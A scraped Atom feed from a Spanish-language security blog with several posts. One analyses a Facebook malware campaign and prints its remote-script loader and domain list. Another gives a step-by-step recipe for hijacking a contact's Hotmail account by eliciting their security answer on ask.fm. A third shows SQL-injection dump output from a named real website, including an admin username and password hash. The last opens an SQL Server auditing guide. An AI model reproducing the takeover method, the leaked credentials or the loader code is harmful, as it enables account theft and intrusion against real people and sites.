&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-_zMofCrBcrs/TuWQIfNg2LI/AAAAAAAAAOg/3_YsMRSZ5m8/s1600/2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-_zMofCrBcrs/TuWQIfNg2LI/AAAAAAAAAOg/3_YsMRSZ5m8/s1600/2.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;b&gt;Imagen 2:&lt;/b&gt; Instalación plug-in.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Ahora no se que más sigue, no lo instalaré para auto infectarme. Miro el código fuente del blogger y me encuentro el siguiente enlace a otro website, ahora la pagina principal del malware es &lt;a href="http://vevideo.com.es/" target="_blank"&gt;vevideo.com.es&lt;/a&gt;,&lt;br /&gt;
&lt;pre class="brush: javascript"&gt;&amp;lt;iframe frameborder = "0"
        height      = "300"
        id          = "change"
        scrolling   = "no"
        src         = "http://vevideo.com.es/plugin/plugin.php"
        width       = "500"&amp;gt;
&amp;lt;/iframe&amp;gt;
&lt;/pre&gt;Descargo el supuesto plug-in y miro su código fuente, esto es lo que realmente nos interesa. Me encuentro con la siguiente función, supongo que será la que se cargará, además tiene la misma dirección anterior.&lt;br /&gt;
&lt;pre class="brush: javascript"&gt;function loadScript_you() {
   if ('https:' == document.location.protocol) return false;
   var s = document.createElement('script');
   s.setAttribute("type","text/javascript");
   s.setAttribute("src", "http://vevideo.com.es/plugin/script.js");
   var head=document.getElementsByTagName("head")[0];
   if( head==null) return false;
   head.appendChild(s);
   return true;
}
&lt;/pre&gt;Analizando encuentro una lista de blogs, supongo que serán del autor del malware, de no ser así, porque estaría allí?, &lt;i&gt;(te detecte querido malwariento ajjajaja)&lt;/i&gt;.&lt;br /&gt;
&lt;pre class="brush: javascript"&gt;var blogs = new Array();
blogs[0] = 'http://deco11.blogspot.com/';
blogs[1] = 'http://decu12.blogspot.com/';
blogs[2] = 'http://decu13.blogspot.com/';
blogs[3] = 'http://decu14.blogspot.com/';
blogs[4] = 'http://decu15.blogspot.com/';
blogs[5] = 'http://decu16.blogspot.com/';
blogs[6] = 'http://decu17.blogspot.com/';
blogs[7] = 'http://decu18.blogspot.com/';
blogs[8] = 'http://decu19.blogspot.com/';
blogs[9] = 'http://decu20.blogspot.com/';
&lt;/pre&gt;Verifico el &lt;a href="http://www.blogger.com/profile/09019206255159716186 "&gt;perfil&lt;/a&gt; y no dice gran cosa, pero me llamo la atención que la localidad donde se encuentra el supuestro creado del malware es &lt;a href="http://www.blogger.com/profile-find.g?t=l&amp;loc0=CO&amp;loc1=Nari%C3%B1o&amp;loc2=Pasto"&gt;Pasto&lt;/a&gt; : &lt;a href="http://www.blogger.com/profile-find.g?t=l&amp;loc0=CO&amp;loc1=Nari%C3%B1o"&gt;Nariño&lt;/a&gt; : &lt;a href="http://www.blogger.com/profile-find.g?t=l&amp;loc0=CO"&gt;Colombia&lt;/a&gt;, &lt;i&gt;(a pesar de todo los pastusos no son tan tontos como dicen que son)&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
Este es el &lt;a href="http://vevideo.com.es/plugin/extra.js"&gt;script&lt;/a&gt; que se encarga de realizar el malware, como siempre esta ofuscado, vamos a nuestra querida website &lt;a href="http://jsbeautifier.org/"&gt;jsbeautifier.org&lt;/a&gt; y lo desofuscamos.&lt;br /&gt;
&lt;br /&gt;
... y seguimos con otro listado de blogs, algunos de ellos ya deshabilitados, pero todos con el mismo contenido.&lt;br /&gt;
&lt;pre class="brush: javascript"&gt;[+] goldenboif.blogspot.com
[+] deco11.blogspot.com
[+] decu12.blogspot.com
[+] decu13.blogspot.com
[+] decu14.blogspot.com
[+] decu15.blogspot.com
[+] decu16.blogspot.com
[+] decu17.blogspot.com
[+] decu18.blogspot.com
[+] decu19.blogspot.com
[+] decu20.blogspot.com
[+] tuqam5.blogspot.com
[+] tytyty22.blogspot.com
[+] tytyty33.blogspot.com
[+] tytyty44.blogspot.com
[+] ferdie11.blogspot.com
[+] ferdie22.blogspot.com
[+] ferdie333.blogspot.com
[+] ferdie44.blogspot.com
[+] gorth11.blogspot.com
[+] gorth22.blogspot.com
[+] gorth33.blogspot.com
[+] gorth44.blogspot.com
[+] poiuyt11.blogspot.com
[+] poiuyt22.blogspot.com
[+] poiuyt33.blogspot.com
[+] poiuyt44.blogspot.com
[+] poiuyt55.blogspot.com
[+] dutter11.blogspot.com
[+] dutter22.blogspot.com
[+] dutter33.blogspot.com
[+] dutter44.blogspot.com
[+] dutter55.blogspot.com
[+] means2.blogspot.com
[+] means22.blogspot.com
[+] means3.blogspot.com
[+] means4.blogspot.com
[+] means55.blogspot.com
[+] futtw11.blogspot.com
[+] futtw22.blogspot.com
[+] futtw33.blogspot.com
[+] futtw44.blogspot.com
[+] futtw55.blogspot.com
[+] roter1.blogspot.com
[+] roter2.blogspot.com
[+] roter3.blogspot.com
[+] roter4.blogspot.com
[+] roter5.blogspot.com
[+] rastar11.blogspot.com
[+] rastar12.blogspot.com
[+] rastar13.blogspot.com
[+] rastar14.blogspot.com
[+] rastar15.blogspot.com
[+] holy11.blogspot.com
[+] hosly22.blogspot.com
[+] hosly333.blogspot.com
[+] hosly44.blogspot.com
[+] hosly55.blogspot.com
[+] fukity11.blogspot.com
[+] fukity22.blogspot.com
[+] fukity33.blogspot.com
[+] fukity44.blogspot.com
[+] fukity55.blogspot.com
[+] floress22.blogspot.com
[+] guddp11.blogspot.com
[+] guddp22.blogspot.com
[+] guddp33.blogspot.com
[+] guddp44.blogspot.com
[+] vulyt55.blogspot.com
[+] vulyt44.blogspot.com
[+] vulyt33.blogspot.com
[+] vulyt22.blogspot.com
[+] vulyt11.blogspot.com
[+] bulyr11.blogspot.com
[+] bulyr22.blogspot.com
[+] bulyr33.blogspot.com
[+] bulyr44.blogspot.com
[+] bulyr55.blogspot.com
[+] vulty11.blogspot.com
[+] vulty22.blogspot.com
[+] vulty33.blogspot.com
[+] foly44.blogspot.com
[+] gelkh11.blogspot.com
[+] goli11.blogspot.com
[+] goli22.blogspot.com
[+] goli33.blogspot.com
[+] goli44.blogspot.com
[+] gelkh22.blogspot.com
[+] gelkh33.blogspot.com
[+] gelkh44.blogspot.com
[+] gelko55.blogspot.com
[+] gelko66.blogspot.com
[+] gelko77.blogspot.com
[+] gelko88.blogspot.com
[+] gelko11.blogspot.com
[+] gelko22.blogspot.com
[+] gelko33.blogspot.com
[+] gelko44.blogspot.com
[+] julip22.blogspot.com
[+] julip33.blogspot.com
[+] bloll8.blogspot.com
[+] holk66.blogspot.com
[+] holk55.blogspot.com
[+] holk77.blogspot.com
[+] holk88.blogspot.com
[+] hy6y6.blogspot.com
[+] hy6y7.blogspot.com
[+] julip88.blogspot.com
[+] julip99.blogspot.com
[+] bloqq3.blogspot.com
[+] bloqq4.blogspot.com
[+] bloyy5.blogspot.com
[+] bloyy6.blogspot.com
[+] kolk11.blogspot.com
[+] kolkk22.blogspot.com&lt;/pre&gt;Encuentro la función que es usada para repartir el malware en Facebook y no me gusto, se nota instantaneamente que fue codeado por un n00b. Ya no diré más, dejaré hasta acá, no perderé más mi tiempo, pensé que era más avanzado.&lt;br /&gt;
&lt;br /&gt;
&lt;h1&gt;ELIMINAR MALWARE!&lt;/h1&gt;Al ver el código tan básico se me olvidaba decir como eliminarlo, es una extensión &lt;i&gt;( &lt;b&gt;*.crx&lt;/b&gt; | &lt;b&gt;*.xpi&lt;/b&gt; )&lt;/i&gt; así que mirad lo siguiente,&lt;br /&gt;
&lt;br /&gt;
Para &lt;a href="http://support.google.com/chrome/bin/answer.py?hl=es&amp;answer=113907" target="_blank"&gt;Google Chrome&lt;/a&gt;&lt;br /&gt;
Para &lt;a href="http://support.mozilla.com/es/kb/Desinstalar%20los%20complementos#w_deshabilitar-extensiones-0-personassf-y-plugins" target="_blank"&gt;Firefox&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-4347957796704148643?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/6jOcERuhagNlSuJoLmfcsxPDuUM/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/6jOcERuhagNlSuJoLmfcsxPDuUM/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/6jOcERuhagNlSuJoLmfcsxPDuUM/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/6jOcERuhagNlSuJoLmfcsxPDuUM/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/k1wArw8SbAE" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/4347957796704148643/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/12/malware-de-nuevo-en-facebook.html#comment-form" title="6 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4347957796704148643?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4347957796704148643?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/k1wArw8SbAE/malware-de-nuevo-en-facebook.html" title="MALWARE DE NUEVO EN FACEBOOK" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-SGgxdnAvdbA/TuWPLOfMD8I/AAAAAAAAAOY/6tnL6G-kHmg/s72-c/1.png" height="72" width="72" /><thr:total>6</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/12/malware-de-nuevo-en-facebook.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkMAQH0zfip7ImA9WhRQEUg.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-4423721976030832257</id><published>2011-12-05T21:32:00.000-08:00</published><updated>2011-12-05T21:47:21.386-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-05T21:47:21.386-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Auditorías de Seguridad" /><category scheme="http://www.blogger.com/atom/ns#" term="ask.fm" /><title>EL PELIGRO DE USAR [ask.fm]</title><content type="html">&lt;div class="IMGpequena"&gt;&lt;img height="150" src="http://1.bp.blogspot.com/-qfIppBbWOnI/To4BecspAFI/AAAAAAAAAMI/786JT1Nkhc8/s200/ask_fm_02.png" width="200" /&gt;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Desde hace algunos días veo que varios contactos de mi &lt;a href="http://www.facebook.com/" target="_blank"&gt;facebook&lt;/a&gt;, responden preguntas mediante el mecanismo llamado &lt;a href="http://ask.fm/" target="_blank"&gt;ask.fm&lt;/a&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;h1&gt;¿CÓMO FUNCIONA ESTO?&lt;/h1&gt;Simple, es una pagina donde los usuarios ingresan y crean una cuenta, y personas conocidas o anónimas pueden ingresar y realizarte cualquier pregunta, mientras tú la respondes. &lt;i&gt;(Se supone que debe de ser sincera la respuesta, pero hay personas que preguntan hasta: &lt;b&gt;¿Cuantas veces vas al baño?&lt;/b&gt; y algunos llegan al extremo de preguntar: &lt;b&gt;¿A que vas al baño?&lt;/b&gt; ajjajaja)&lt;/i&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;h1&gt;¿CÓMO PUEDE LLEGAR A SER ESTO PELIGROSO?&lt;/h1&gt;Tambien es simple, hay personas que no les importa contestar sinceramente las preguntas, &lt;i&gt;-así deberían de ser todos, pues este es el fin de la pagina, o sino para que lo creaste?-&lt;/i&gt;, el caso es qué al contestar la pregunta estas dando casi un 90% de acierto para que puedan robarte tu cuenta de correo, o ya no te acuerdas que &lt;a href="https://account.live.com/password/reset" target="_blank"&gt;hotmail&lt;/a&gt; ofrece la oportunidad de devolver la cuenta de correo mediante una pregunta que previamente cuando creaste tu cuenta debiste de responder?&lt;br /&gt;
&lt;br /&gt;
No se para que mie#"! la gente crea una cuenta en &lt;a href="http://ask.fm/" target="_blank"&gt;ask.fm&lt;/a&gt;, no se que le ven de interesante estar respondiendo preguntas que a los otros ni les interesa, sólo preguntan para mostrarse al mundo, que EXISTEN.&lt;br /&gt;
&lt;br /&gt;
&lt;h1&gt;NO ME CREEN? MIREN UN EJEMPLO.&lt;/h1&gt;Seleccionamos nuestra victima en &lt;a href="http://www.facebook.com/" target="_blank"&gt;facebook&lt;/a&gt;, en la información buscamos la cuenta de correo que usa para conectarse en esta red social.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-k2CdqDHGkRc/Tt2fPk1CUUI/AAAAAAAAANc/8nFTIhBjaew/s1600/1.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-k2CdqDHGkRc/Tt2fPk1CUUI/AAAAAAAAANc/8nFTIhBjaew/s1600/1.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;b&gt;Imagen 1:&lt;/b&gt; Correo electronico del perfil de la victima.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Ahora, vamos a &lt;a href="https://account.live.com/password/reset" target="_blank"&gt;Cuenta ► Restablecer la contraseña&lt;/a&gt;&amp;nbsp;y seleccionamos la opción de &lt;b&gt;He olvidado mi contraseña&lt;/b&gt;.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-9L6pnrTu3nk/Tt2gASdnRvI/AAAAAAAAANk/EQ-R0fbVSGI/s1600/2.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="87" src="http://2.bp.blogspot.com/-9L6pnrTu3nk/Tt2gASdnRvI/AAAAAAAAANk/EQ-R0fbVSGI/s400/2.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;b&gt;Imagen 2:&lt;/b&gt; Seleccionando opción para averiguar pregunta secreta de la cuenta.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Ahora nos muestra una caja de texto para ingresar la cuenta de correo del perfil victima y la captcha de seguridad,&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-Xb5KAkKDM_w/Tt2h1vZ5FGI/AAAAAAAAANs/ne3RNzq2lWA/s1600/3.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="156" src="http://3.bp.blogspot.com/-Xb5KAkKDM_w/Tt2h1vZ5FGI/AAAAAAAAANs/ne3RNzq2lWA/s320/3.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;b&gt;Imagen 3:&lt;/b&gt; Cuenta de correo y captcha.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Los ingresamos y nos mostrará la siguiente información, &lt;i&gt;(puede variar ya que algunas personas seleccionan la opción de sólo restablecer la cuenta de correo sólo al correo alternativo, mmm eso me hace acordar de algo &lt;a href="http://shellrootsecurity.blogspot.com/2010/12/el-bug-del-correo-alternativo-hotmail.html" target="_blank"&gt;EL BUG DEL CORREO ALTERNATIVO [HOTMAIL]&lt;/a&gt;)&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-jLZKL2SmCe8/Tt2iqPDWnuI/AAAAAAAAAN0/Vts2W-taUq8/s1600/5.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="237" src="http://4.bp.blogspot.com/-jLZKL2SmCe8/Tt2iqPDWnuI/AAAAAAAAAN0/Vts2W-taUq8/s320/5.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;b&gt;Imagen 4:&lt;/b&gt; Respuesta a la pregunta de seguridad.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Aquí es donde debemos de usar nuestra ingeniería social, para realizar la pregunta en la cuenta de la victima en &lt;a href="http://ask.fm/" target="_blank"&gt;ask.fm&lt;/a&gt;, miremos:&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-uYH823G4unk/Tt2nRkO5emI/AAAAAAAAAN8/HpzZfZkJR2Q/s1600/7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="54" src="http://1.bp.blogspot.com/-uYH823G4unk/Tt2nRkO5emI/AAAAAAAAAN8/HpzZfZkJR2Q/s320/7.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;b&gt;Imagen 5:&lt;/b&gt; Pregunta y respuesta en &lt;a href="http://ask.fm/" target="_blank"&gt;ask.fm&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;&lt;b&gt;NOTA:&lt;/b&gt; Que se note la pregunta tan directa que realice, me dio tan duro pensarla ajajajajajjaa&lt;/blockquote&gt;&lt;br /&gt;
Ahora volvemos a &lt;a href="https://account.live.com/password/reset" target="_blank"&gt;hotmail&lt;/a&gt;, ingresamos la respuesta que nos dieron y VOALA!&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/--EBYME9BC0k/Tt2oj0HhDiI/AAAAAAAAAOE/eyMBlsp5M94/s1600/8.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="159" src="http://3.bp.blogspot.com/--EBYME9BC0k/Tt2oj0HhDiI/AAAAAAAAAOE/eyMBlsp5M94/s320/8.png" width="320" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;b&gt;Imagen 6:&lt;/b&gt; Pantalla para cambiar la contraseña.&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Así que antes de responder, recuerda cual es tu pregunta de seguridad en todas las cuentas de correo que tengas enlazadas a tu perfil en &lt;a href="http://www.facebook.com/" target="_blank"&gt;facebook&lt;/a&gt;.&lt;br /&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-4423721976030832257?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/UWALJTPA7fwKEw9aTtlVEp3QD8U/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/UWALJTPA7fwKEw9aTtlVEp3QD8U/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/UWALJTPA7fwKEw9aTtlVEp3QD8U/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/UWALJTPA7fwKEw9aTtlVEp3QD8U/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/otpUoCtfJdU" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/4423721976030832257/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/12/el-peligro-de-usar-askfm.html#comment-form" title="2 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4423721976030832257?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/4423721976030832257?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/otpUoCtfJdU/el-peligro-de-usar-askfm.html" title="EL PELIGRO DE USAR [ask.fm]" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-qfIppBbWOnI/To4BecspAFI/AAAAAAAAAMI/786JT1Nkhc8/s72-c/ask_fm_02.png" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/12/el-peligro-de-usar-askfm.html</feedburner:origLink></entry><entry gd:etag="W/&quot;CkIGRn0yeCp7ImA9WhRRGEw.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-8971395491250196756</id><published>2011-12-01T23:22:00.000-08:00</published><updated>2011-12-01T23:22:07.390-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-01T23:22:07.390-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="iSQL" /><title>NI LOS MUERTOS SE SALVAN</title><content type="html">&lt;center&gt;&lt;img height="200" src="http://www.jardinesdepaz.com.co/imagenes/bannerLOGO.jpg" width="400" /&gt;&lt;/center&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;pre class='brush:sql'&gt;#
# BASE DE DATOS
CURRENT DB: wwwjardines

#TABLAS
COUNT(table_name) OF information_schema.tables WHERE table_schema=0x7777776A617264696E6573 IS 32 TABLES FOUND:
[+] Aspirante
[+] Banner
[+] CategoriaInstalacion
[+] CategoriaProducto
[+] Ciudad
[+] ConsultaExepaz
[+] ConsultaMemorial
[+] Convenio
[+] Departamento
[+] DocumentoNoticia
[+] FormularioContacto
[+] FormularioProducto
[+] GaleriaInstalacion
[+] GaleriaNoticia
[+] GaleriaProducto
[+] Instalacion
[+] Log
[+] MapaLote
[+] Noticia
[+] NoticiaModulo
[+] Obituario
[+] Pais
[+] Parametros
[+] Perfil
[+] PlanExepaz
[+] Producto
[+] Registro
[+] Sesion
[+] Sesion_Cliente
[+] TipoContacto
[+] Usuario
[+] VideoNoticia

#COLUMNAS
COUNT(column_name) OF information_schema.columns WHERE table_schema=0x7777776A617264696E6573 AND table_name=0x5573756172696F IS 17 COLUMNS FOUND:
[+] IDUsuario
[+] IDPais
[+] IDDepartamento
[+] IDCiudad
[+] IDPerfil
[+] Nombre
[+] Telefono
[+] User
[+] Password
[+] EmaiL
[+] Autorizado
[+] Nivel
[+] Lenguaje
[+] FechaTrCr
[+] UsuarioTrCr
[+] UsuarioTrEd
[+] FechaTrEd

#REGISTROS
COUNT(*) OF wwwjardines.Usuario IS 1
Data Found: Password=1d2440cb12e1ce5a
Data Found: User=soluciones
#&lt;/pre&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3627674836739440773-8971395491250196756?l=shellrootsecurity.blogspot.com' alt='' /&gt;&lt;/div&gt;
&lt;p&gt;&lt;a href="http://feedads.g.doubleclick.net/~a/LCKpX1_Erb_TuTQ2K8wWhYcIO74/0/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/LCKpX1_Erb_TuTQ2K8wWhYcIO74/0/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;br/&gt;
&lt;a href="http://feedads.g.doubleclick.net/~a/LCKpX1_Erb_TuTQ2K8wWhYcIO74/1/da"&gt;&lt;img src="http://feedads.g.doubleclick.net/~a/LCKpX1_Erb_TuTQ2K8wWhYcIO74/1/di" border="0" ismap="true"&gt;&lt;/img&gt;&lt;/a&gt;&lt;/p&gt;&lt;img src="http://feeds.feedburner.com/~r/blogspot/huJTw/~4/qxI7zqrWkt0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://shellrootsecurity.blogspot.com/feeds/8971395491250196756/comments/default" title="Enviar comentarios" /><link rel="replies" type="text/html" href="http://shellrootsecurity.blogspot.com/2011/12/ni-los-muertos-se-salvan.html#comment-form" title="0 comentarios" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/8971395491250196756?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3627674836739440773/posts/default/8971395491250196756?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/blogspot/huJTw/~3/qxI7zqrWkt0/ni-los-muertos-se-salvan.html" title="NI LOS MUERTOS SE SALVAN" /><author><name>Shell Root</name><uri>https://profiles.google.com/115905895667714548847</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh3.googleusercontent.com/-xlDCf4FiEsQ/AAAAAAAAAAI/AAAAAAAAAMo/-4TuSe9gQEo/s512-c/photo.jpg" /></author><thr:total>0</thr:total><feedburner:origLink>http://shellrootsecurity.blogspot.com/2011/12/ni-los-muertos-se-salvan.html</feedburner:origLink></entry><entry gd:etag="W/&quot;AkQHRno-eip7ImA9WhRRF0s.&quot;"><id>tag:blogger.com,1999:blog-3627674836739440773.post-2257626786513631866</id><published>2011-12-01T11:38:00.000-08:00</published><updated>2011-12-01T11:38:57.452-08:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2011-12-01T11:38:57.452-08:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Auditorías de Seguridad" /><category scheme="http://www.blogger.com/atom/ns#" term="MSSQL" /><title>AUDITORÍA DE SEGURIDAD EN SQL SERVER 2008</title><content type="html">&lt;div style="font-family: Georgia, 'Times New Roman', serif; text-align: justify;"&gt;La primera pregunta que nos surge es: ¿Porque auditamos?&lt;br /&gt;
&lt;br /&gt;
Revisando la literatura de auditoría de seguridad, los autores coinciden en que el tener políticas de seguridad es un factor crítico para mantener los datos seguros. La auditoría también nos ayuda a identificar lo que accedió un intruso en el evento de que un ataque sea exitoso.&lt;br /&gt;
&lt;br /&gt;
En SQL 2005 el enfoque estaba orientado a asegurarse de que el usuario no tuviera privilegio mayores a los que necesitaba y que los cambios fueran realizados por el personal autorizado. La herramienta que se promovía para auditar los cambios a la base de datos era el SQL Profiler ya que podía auditar cambios al esquema, operaciones de insertar, actualizar o eliminar registros; y eventos relacionados con cambios de permisos o la creación de nuevos Logins.&lt;br /&gt;
&lt;br /&gt;
Una de las mejoras que trajo SQL Server 2008 Enterprise es un incremento en la capacidad de auditoría a través del uso del SQL Server Audit. A través de esta funcionalidad se puede rastrear y registrar de forma automática los eventos que ocurren a nivel del servidor o a nivel de la base de datos. Esto es posible a través del uso del objeto Audit. Veamos entonces como crear una auditoría, como crear y habilitar una especificación de auditoría a nivel de Servidor o a nivel de base de datos y como visualizar los registros de auditoría.&lt;br /&gt;
&lt;br /&gt;
